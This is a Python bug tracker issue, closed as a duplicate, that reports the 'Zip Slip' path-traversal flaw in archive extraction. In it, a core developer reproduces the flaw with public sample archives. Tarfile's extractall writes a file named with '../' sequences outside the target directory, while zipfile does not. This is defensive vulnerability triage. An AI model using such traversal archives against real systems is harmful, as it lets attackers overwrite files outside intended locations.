classification
Title: Zip Slip Vulnerability
Type: security Stage: resolved
Components: Library (Lib) Versions: Python 3.8, Python 3.7, Python 3.6, Python 3.4, Python 3.5, Python 2.7
process
Status: closed Resolution: duplicate
Dependencies: Superseder: tarfile: Traversal attack vulnerability
View: 21109
Assigned To: christian.heimes Nosy List: SilentGhost, christian.heimes, jeffknupp, push0ebp, uhei3nn9
Priority: normal Keywords: security_issue

Created on 2019-02-06 09:37 by uhei3nn9, last changed 2019-02-06 10:36 by christian.heimes. This issue is now closed.

Messages (6)
msg334910 - (view) Author: uhei3nn9 (uhei3nn9) Date: 2019-02-06 09:37
As has been discovered in 06.2018 the python library is affected by the zip slip vulbnerability (meaning code execution)

The affected section https://github.com/python/cpython/blob/3.7/Lib/tarfile.py has not been patched since then.

Therefore it seems python has not yet fixed this vulnerability.


Source:
https://github.com/snyk/zip-slip-vulnerability
msg334911 - (view) Author: Sihoon Lee (push0ebp) * Date: 2019-02-06 09:47
When I had tested it before, It was not worked.
Was it really worked?
Could you show me your PoC Code?
msg334914 - (view) Author: Jeff Knupp (jeffknupp) * Date: 2019-02-06 10:05
According to https://snyk.io/research/zip-slip-vulnerability (the source of the paper), Python hasn't been vulnerable since 2014.
msg334918 - (view) Author: SilentGhost (SilentGhost) * (Python triager) Date: 2019-02-06 10:14
issue 21109 was mentioned as an example of reported behaviour in https://github.com/snyk/zip-slip-vulnerability/issues/4#issuecomment-395848367
msg334920 - (view) Author: Christian Heimes (christian.heimes) * (Python committer) Date: 2019-02-06 10:32
You are both right and wrong. The zipfile module of Python 3.7 is fine, but the tarfile module is still vulnerable.

$ curl -O https://raw.githubusercontent.com/snyk/zip-slip-vulnerability/master/archives/zip-slip.zip
$ curl -O https://raw.githubusercontent.com/snyk/zip-slip-vulnerability/master/archives/zip-slip.tar
$ mkdir /tmp/zipslip
$ cd /tmp/zipslip

Test zipfile:

$ python3
>>> import zipfile
>>> zf = zipfile.ZipFile('zip-slip.zip')
>>> zf.printdir()
File Name                                             Modified             Size
good.txt                                       2018-04-15 22:04:30           19
../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/evil.txt 2018-04-15 22:04:42           20
>>> zf.extractall()
>>> exit()
$ find
.
./tmp
./tmp/evil.txt
./good.txt
./zip-slip.tar
./zip-slip.zip

Test tarfile

$ rm -rf good.txt tmp/
$ python3
>>> import tarfile
>>> import tarfile
>>> tf = tarfile.TarFile('zip-slip.tar')
>>> tf.list()
?rw-r--r-- grander/staff         19 2018-04-15 19:04:29 good.txt 
?rw-r--r-- grander/staff         20 2018-06-03 13:49:05 ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/evil.txt 
>>> tf.extractall()
# find
.
./zip-slip.tar
./good.txt
./zip-slip.zip
# cat /tmp/evil.txt 
this is an evil one
msg334922 - (view) Author: Christian Heimes (christian.heimes) * (Python committer) Date: 2019-02-06 10:36
Thanks for reporting the issue. I'm closing this issue as duplicate of #21109. Let's keep all discussion on one issue.
History
Date User Action Args
2019-02-06 10:36:07christian.heimessetstatus: open -> closed
superseder: tarfile: Traversal attack vulnerability
messages: + msg334922

resolution: duplicate
stage: resolved
2019-02-06 10:32:47christian.heimessetmessages: + msg334920
2019-02-06 10:14:22SilentGhostsetnosy: + SilentGhost
messages: + msg334918
2019-02-06 10:05:28jeffknuppsetnosy: + jeffknupp
messages: + msg334914
2019-02-06 09:58:33rhettingersetassignee: christian.heimes

nosy: + christian.heimes
2019-02-06 09:47:21push0ebpsetnosy: + push0ebp, - lars.gustaebel
messages: + msg334911
2019-02-06 09:45:08SilentGhostsetkeywords: + security_issue
nosy: + lars.gustaebel
2019-02-06 09:37:04uhei3nn9create